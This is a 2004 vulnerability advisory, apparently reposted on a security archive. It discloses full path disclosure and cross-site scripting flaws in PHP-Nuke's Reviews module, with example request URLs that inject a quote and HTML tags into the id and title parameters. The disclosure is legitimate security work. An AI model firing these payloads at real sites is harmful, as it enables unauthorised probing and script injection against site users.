exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

advisory-05.txt

advisory-05.txt
Posted Jun 9, 2004
Authored by DarkBicho | Site darkbicho.tk

PHP-Nuke versions 6.x, 7.2, and 7.3 all suffer from path disclosure and cross site scripting vulnerabilities.

tags | advisory, php, vulnerability, xss
SHA-256 | e5528eabe39a9466ee8453c39b40a4c3c84df99e60e44cf60448c31ed35d0e1c

advisory-05.txt

Change Mirror Download

-------------------------------------------------------------------------------------------------

:.: Multiple vulnerabilities PHP-Nuke :.:

PROGRAM: PHP-Nuke
HOMEPAGE: https://phpnuke.org/
VERSION: 6.x, 7.2, 7.3
BUG: Multiple vulnerabilities
DATE: 14/05/2004
AUTHOR: DarkBicho
web: https://www.darkbicho.tk
team: Security Wari Proyects <www.swp-zone.org>
Email: darkbicho@peru.com

-------------------------------------------------------------------------------------------------


1.- Affected software description:
-----------------------------

Php-Nuke is a popular content management system, written in php by
Francisco Burzi.

2.- Vulnerabilities:
---------------

A. Full path disclosure:

This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive information.

:.: Examples:

https://localhost/nuke1/modules.php?name=Reviews&rop=showcontent&id='DarkBicho

Warning: date(): Windows does not support dates prior to midnight (00:00:00),
January 1, 1970 in c:\appserv\www\nuke1\modules\Reviews\index.php on line 527

B. Cross-Site Scripting aka XSS:

:.: id :

* https://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&title=a

<input type=hidden name=id value='>

:.: title :

* https://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&title=a

:.: Examples:

https://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='<h1>DarkBicho</h1&title=a
https://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&title=<h1>DarkBicho</h1>


3.- SOLUTION:
¨¨¨¨¨¨¨¨
Vendors were contacted many weeks ago and plan to release a fixed version soon.
Check the PHP-NUKE website for updates and official release details.


4.- Greetings:
---------

greetings to my Peruvian group swp and perunderforce :D
"EL PISCO ES Y SERA PERUANO"


5.- Contact
-------

WEB: https://www.darkbicho.tk
EMAIL: darkbicho@peru.com

-------------------------------------------------------------------------------------------------
___________ ____________
/ _____/ \ / \______ \
\_____ \\ \/\/ /| ___/
/ \\ / | |
/_______ / \__/\ / |____|
\/ \/

Security Wari Projects
(c) 2002 - 2004
Made in Peru

----------------------------------------[ EOF ]----------------------------------------------
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close